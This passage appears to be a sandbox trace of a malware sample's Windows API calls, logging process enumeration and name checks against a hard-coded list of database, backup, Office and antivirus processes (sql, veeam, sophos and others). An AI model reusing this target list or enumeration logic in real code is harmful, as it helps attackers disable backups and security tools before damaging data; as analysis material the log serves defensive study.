WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.968] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3584c70 [0177.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3584c70, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0177.968] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0177.968] StrStrIA (lpFirst="ripe.exe", lpSrch="benetns") returned 0x0 [0177.968] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0177.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.970] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584d30 [0177.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3584d30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0177.970] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0177.970] StrStrIA (lpFirst="acoustic.exe", lpSrch="benetns") returned 0x0 [0177.970] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0177.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.971] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3584d60 [0177.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3584d60, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0177.971] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0177.971] StrStrIA (lpFirst="mail.exe", lpSrch="benetns") returned 0x0 [0177.971] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0177.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.972] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584da8 [0177.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3584da8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0177.972] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0177.972] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="benetns") returned 0x0 [0177.972] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.973] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35823d8 [0177.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35823d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.973] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.973] StrStrIA (lpFirst="svchost.exe", lpSrch="benetns") returned 0x0 [0177.974] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0177.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.975] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35821c8 [0177.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x35821c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.975] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0177.975] StrStrIA (lpFirst="dllhost.exe", lpSrch="benetns") returned 0x0 [0177.975] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0177.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.976] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35820f0 [0177.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35820f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0177.976] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0177.976] StrStrIA (lpFirst="taskhostw.exe", lpSrch="benetns") returned 0x0 [0177.976] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0177.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.977] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3582168 [0177.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3582168, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0177.977] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0177.977] StrStrIA (lpFirst="UsoClient.exe", lpSrch="benetns") returned 0x0 [0177.977] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0177.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0177.978] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x35960e8 [0177.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x35960e8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0177.979] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0177.979] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="benetns") returned 0x0 [0177.979] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0177.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0177.980] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3595f68 [0177.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3595f68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0177.980] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0177.980] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="benetns") returned 0x0 [0177.980] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0177.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.981] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582600 [0177.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3582600, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.981] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0177.981] StrStrIA (lpFirst="conhost.exe", lpSrch="benetns") returned 0x0 [0177.981] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0177.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.982] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582630 [0177.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3582630, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.982] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0177.982] StrStrIA (lpFirst="conhost.exe", lpSrch="benetns") returned 0x0 [0177.982] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0177.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.983] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3582408 [0177.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3582408, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0177.983] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0177.983] StrStrIA (lpFirst="rxodge.exe", lpSrch="benetns") returned 0x0 [0177.983] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0177.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.984] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35824c8 [0177.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x35824c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0177.984] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0177.984] StrStrIA (lpFirst="sppsvc.exe", lpSrch="benetns") returned 0x0 [0177.984] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0177.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0177.986] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595f08 [0177.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x3595f08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0177.986] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0177.986] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="benetns") returned 0x0 [0177.986] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0177.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.987] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35825d0 [0177.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x35825d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0177.987] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0177.987] StrStrIA (lpFirst="TiWorker.exe", lpSrch="benetns") returned 0x0 [0177.987] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0177.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0177.988] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3586a30 [0177.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sc.exe", cchWideChar=-1, lpMultiByteStr=0x3586a30, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sc.exe", lpUsedDefaultChar=0x0) returned 7 [0177.988] lstrcpyA (in: lpString1=0x567fabc, lpString2="sc.exe" | out: lpString1="sc.exe") returned="sc.exe" [0177.988] StrStrIA (lpFirst="sc.exe", lpSrch="benetns") returned 0x0 [0177.988] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0177.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WMIADAP.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.989] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582588 [0177.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WMIADAP.exe", cchWideChar=-1, lpMultiByteStr=0x3582588, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WMIADAP.exe", lpUsedDefaultChar=0x0) returned 12 [0177.989] lstrcpyA (in: lpString1=0x567fabc, lpString2="WMIADAP.exe" | out: lpString1="WMIADAP.exe") returned="WMIADAP.exe" [0177.989] StrStrIA (lpFirst="WMIADAP.exe", lpSrch="benetns") returned 0x0 [0177.989] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1158, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0177.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.991] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35825e8 [0177.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35825e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.991] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0177.991] StrStrIA (lpFirst="conhost.exe", lpSrch="benetns") returned 0x0 [0177.991] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.992] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582618 [0177.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582618, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.992] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.992] StrStrIA (lpFirst="svchost.exe", lpSrch="benetns") returned 0x0 [0177.992] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0177.992] CloseHandle (hObject=0x370) returned 1 [0177.993] SetEvent (hEvent=0x210) returned 1 [0177.993] Sleep (dwMilliseconds=0x2710) [0218.476] lstrcpyA (in: lpString1=0x567f090, lpString2="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v" | out: lpString1="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v") returned="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v" [0218.476] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x38c [0218.516] Process32FirstW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0218.518] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35960c8 [0218.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x35960c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0218.518] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0218.518] StrStrIA (lpFirst="[System Process]", lpSrch="sql") returned 0x0 [0218.519] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, 